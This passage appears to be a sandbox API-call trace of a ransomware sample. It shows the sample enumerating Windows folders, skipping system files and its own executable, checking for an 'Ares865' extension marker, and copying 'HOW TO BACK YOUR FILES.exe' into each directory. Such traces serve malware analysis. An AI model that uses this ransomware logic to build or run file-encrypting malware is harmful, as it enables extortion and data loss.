ftLastWriteTime.dwLowDateTime=0xff0498b1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Feeds", cAlternateFileName="")) returned 1 [0041.594] lstrcmpiW (lpString1="Feeds", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.594] lstrcmpiW (lpString1="Feeds", lpString2="aoldtz.exe") returned 1 [0041.594] lstrcmpiW (lpString1="Feeds", lpString2=".") returned 1 [0041.594] lstrcmpiW (lpString1="Feeds", lpString2="..") returned 1 [0041.594] lstrcmpiW (lpString1="Feeds", lpString2="windows") returned -1 [0041.594] lstrcmpiW (lpString1="Feeds", lpString2="bootmgr") returned 1 [0041.594] lstrcmpiW (lpString1="Feeds", lpString2="temp") returned -1 [0041.594] lstrcmpiW (lpString1="Feeds", lpString2="pagefile.sys") returned -1 [0041.594] lstrcmpiW (lpString1="Feeds", lpString2="boot") returned 1 [0041.594] lstrcmpiW (lpString1="Feeds", lpString2="ids.txt") returned -1 [0041.594] lstrcmpiW (lpString1="Feeds", lpString2="ntuser.dat") returned -1 [0041.594] lstrcmpiW (lpString1="Feeds", lpString2="perflogs") returned -1 [0041.594] lstrcmpiW (lpString1="Feeds", lpString2="MSBuild") returned -1 [0041.594] lstrlenW (lpString="Feeds") returned 5 [0041.594] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Credentials") returned 58 [0041.594] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Feeds" | out: lpString1="Feeds") returned="Feeds" [0041.594] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23a0 [0041.594] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6a) returned 0x2cb388 [0041.594] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23a8 | out: ListHead=0x2e77d0, ListEntry=0x2d23a8) returned 0x2d2388 [0041.594] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfea09ee5, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Feeds Cache", cAlternateFileName="FEEDSC~1")) returned 1 [0041.594] lstrcmpiW (lpString1="Feeds Cache", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.594] lstrcmpiW (lpString1="Feeds Cache", lpString2="aoldtz.exe") returned 1 [0041.594] lstrcmpiW (lpString1="Feeds Cache", lpString2=".") returned 1 [0041.594] lstrcmpiW (lpString1="Feeds Cache", lpString2="..") returned 1 [0041.595] lstrcmpiW (lpString1="Feeds Cache", lpString2="windows") returned -1 [0041.595] lstrcmpiW (lpString1="Feeds Cache", lpString2="bootmgr") returned 1 [0041.595] lstrcmpiW (lpString1="Feeds Cache", lpString2="temp") returned -1 [0041.595] lstrcmpiW (lpString1="Feeds Cache", lpString2="pagefile.sys") returned -1 [0041.595] lstrcmpiW (lpString1="Feeds Cache", lpString2="boot") returned 1 [0041.595] lstrcmpiW (lpString1="Feeds Cache", lpString2="ids.txt") returned -1 [0041.595] lstrcmpiW (lpString1="Feeds Cache", lpString2="ntuser.dat") returned -1 [0041.595] lstrcmpiW (lpString1="Feeds Cache", lpString2="perflogs") returned -1 [0041.595] lstrcmpiW (lpString1="Feeds Cache", lpString2="MSBuild") returned -1 [0041.595] lstrlenW (lpString="Feeds Cache") returned 11 [0041.595] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds") returned 52 [0041.595] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Feeds Cache" | out: lpString1="Feeds Cache") returned="Feeds Cache" [0041.595] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23c0 [0041.595] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x76) returned 0x2c1688 [0041.595] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23c8 | out: ListHead=0x2e77d0, ListEntry=0x2d23c8) returned 0x2d23a8 [0041.595] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a6392c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0041.595] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0041.595] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96e13f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0041.595] lstrcmpiW (lpString1="Internet Explorer", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0041.595] lstrcmpiW (lpString1="Internet Explorer", lpString2="aoldtz.exe") returned 1 [0041.595] lstrcmpiW (lpString1="Internet Explorer", lpString2=".") returned 1 [0041.595] lstrcmpiW (lpString1="Internet Explorer", lpString2="..") returned 1 [0041.595] lstrcmpiW (lpString1="Internet Explorer", lpString2="windows") returned -1 [0041.595] lstrcmpiW (lpString1="Internet Explorer", lpString2="bootmgr") returned 1 [0041.595] lstrcmpiW (lpString1="Internet Explorer", lpString2="temp") returned -1 [0041.595] lstrcmpiW (lpString1="Internet Explorer", lpString2="pagefile.sys") returned -1 [0041.595] lstrcmpiW (lpString1="Internet Explorer", lpString2="boot") returned 1 [0041.595] lstrcmpiW (lpString1="Internet Explorer", lpString2="ids.txt") returned 1 [0041.595] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Internet Explorer" | out: lpString1="Internet Explorer") returned="Internet Explorer" [0041.595] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23e0 [0041.595] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x82) returned 0x2e9eb0 [0041.595] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23e8 | out: ListHead=0x2e77d0, ListEntry=0x2d23e8) returned 0x2d23c8 [0041.596] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x66b2700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd856f385, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0041.596] lstrcmpiW (lpString1="Media Player", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0041.596] lstrcmpiW (lpString1="Media Player", lpString2="aoldtz.exe") returned 1 [0041.596] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Media Player" | out: lpString1="Media Player") returned="Media Player" [0041.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2400 [0041.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x78) returned 0x2c1708 [0041.596] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2408 | out: ListHead=0x2e77d0, ListEntry=0x2d2408) returned 0x2d23e8 [0041.596] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x66d8860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4d1d5e4e, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0041.596] lstrcmpiW (lpString1="Windows", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0041.596] lstrcmpiW (lpString1="Windows", lpString2="aoldtz.exe") returned 1 [0041.596] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Windows Mail" | out: lpString1="Windows Mail") returned="Windows Mail" [0041.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2420 [0041.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x78) returned 0x2c1788 [0041.596] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2428 | out: ListHead=0x2e77d0, ListEntry=0x2d2428) returned 0x2d2408 [0041.596] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf7de167e, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Media", cAlternateFileName="WINDOW~2")) returned 1 [0041.596] lstrcmpiW (lpString1="Windows Media", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0041.596] lstrcmpiW (lpString1="Windows Media", lpString2="aoldtz.exe") returned 1 [0041.596] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Windows Media" | out: lpString1="Windows Media") returned="Windows Media" [0041.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2440 [0041.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7a) returned 0x2effc8 [0041.596] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2448 | out: ListHead=0x2e77d0, ListEntry=0x2d2448) returned 0x2d2428 [0041.596] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 1 [0041.596] lstrcmpiW (lpString1="Windows Sidebar", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0041.596] lstrcmpiW (lpString1="Windows Sidebar", lpString2="aoldtz.exe") returned 1 [0041.596] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Windows Sidebar" | out: lpString1="Windows Sidebar") returned="Windows Sidebar" [0041.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2460 [0041.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f0380 [0041.596] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2468 | out: ListHead=0x2e77d0, ListEntry=0x2d2468) returned 0x2d2448 [0041.596] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 0 [0041.597] FindClose (in: hFindFile=0x2cd028 | out: hFindFile=0x2cd028) returned 1 [0041.597] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2468 [0041.597] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar" [0041.597] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0041.597] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2460 | out: hHeap=0x2b0000) returned 1 [0041.597] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar") returned 62 [0041.597] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar" [0041.597] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0041.597] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows sidebar\\how to back your files.exe"), bFailIfExists=1) returned 1 [0041.713] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0041.713] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd028 [0041.713] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.713] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0041.714] lstrcpyW (in: lpString1=0x2e2e8de, lpString2="Gadgets" | out: lpString1="Gadgets") returned="Gadgets" [0041.714] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2460 [0041.714] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8e) returned 0x2cb400 [0041.714] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2468 | out: ListHead=0x2e77d0, ListEntry=0x2d2468) returned 0x2d2448 [0041.714] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a71db00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0041.714] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0041.714] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings.ini", cAlternateFileName="")) returned 1 [0041.714] lstrcmpiW (lpString1="Settings.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0041.714] lstrcmpiW (lpString1="Settings.ini", lpString2="aoldtz.exe") returned 1 [0041.714] lstrcpyW (in: lpString1=0x2e2e8de, lpString2="Settings.ini" | out: lpString1="Settings.ini") returned="Settings.ini" [0041.714] lstrlenW (lpString="Settings.ini") returned 12 [0041.714] lstrlenW (lpString="Ares865") returned 7 [0041.714] lstrcmpiW (lpString1="ngs.ini", lpString2="Ares865") returned 1 [0041.714] lstrlenW (lpString=".dll") returned 4 [0041.714] lstrcmpiW (lpString1="Settings.ini", lpString2=".dll") returned 1 [0041.714] lstrlenW (lpString=".lnk") returned 4 [0041.714] lstrcmpiW (lpString1="Settings.ini", lpString2=".lnk") returned 1 [0041.715] lstrlenW (lpString=".ini") returned 4 [0041.715] lstrcmpiW (lpString1="Settings.ini", lpString2=".ini") returned 1 [0041.715] lstrlenW (lpString=".sys") returned 4 [0041.715] lstrcmpiW (lpString1="Settings.ini", lpString2=".sys") returned 1 [0041.715] lstrlenW (lpString="Settings.ini") returned 12 [0041.715] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets" [0041.715] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb400 | out: hHeap=0x2b0000) returned 1 [0041.715] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2460 | out: hHeap=0x2b0000) returned 1 [0041.715] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets") returned 70 [0041.715] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets" [0041.715] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0041.715] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows sidebar\\gadgets\\how to back your files.exe"), bFailIfExists=1) returned 1 [0041.719] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0041.719] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd028 [0041.720] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.720] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0041.720] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media" [0041.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0041.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2440 | out: hHeap=0x2b0000) returned 1 [0041.720] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media") returned 60 [0041.720] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media" [0041.720] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0041.720] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows media\\how to back your files.exe"), bFailIfExists=1) returned 1 [0041.724] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0041.724] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0a8 [0041.753] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.753] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0041.753] lstrcpyW (in: lpString1=0x2e2e8da, lpString2="12.0" | out: lpString1="12.0") returned="12.0" [0041.753] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c88 [0041.753] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x84) returned 0x2e9d90 [0041.754] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7c90 | out: ListHead=0x2e77d0, ListEntry=0x2e7c90) returned 0x2d2428 [0041.754] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a71db00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0041.754] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0041.754] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a71db00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0041.754] FindClose (in: hFindFile=0x2cd0a8 | out: hFindFile=0x2cd0a8) returned 1 [0041.754] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2e7c90 [0041.754] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0" [0041.754] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d90 | out: hHeap=0x2b0000) returned 1 [0041.754] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0041.754] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0") returned 65 [0041.754] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0" [0041.754] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0041.754] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows media\\12.0\\how to back your files.exe"), bFailIfExists=1) returned 1 [0041.766] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0041.766] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a78ff20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a78ff20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0a8 [0041.766] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.766] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0041.766] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="WMSDKNS.DTD" | out: lpString1="WMSDKNS.DTD") returned="WMSDKNS.DTD" [0041.766] lstrlenW (lpString="WMSDKNS.DTD") returned 11 [0041.766] lstrlenW 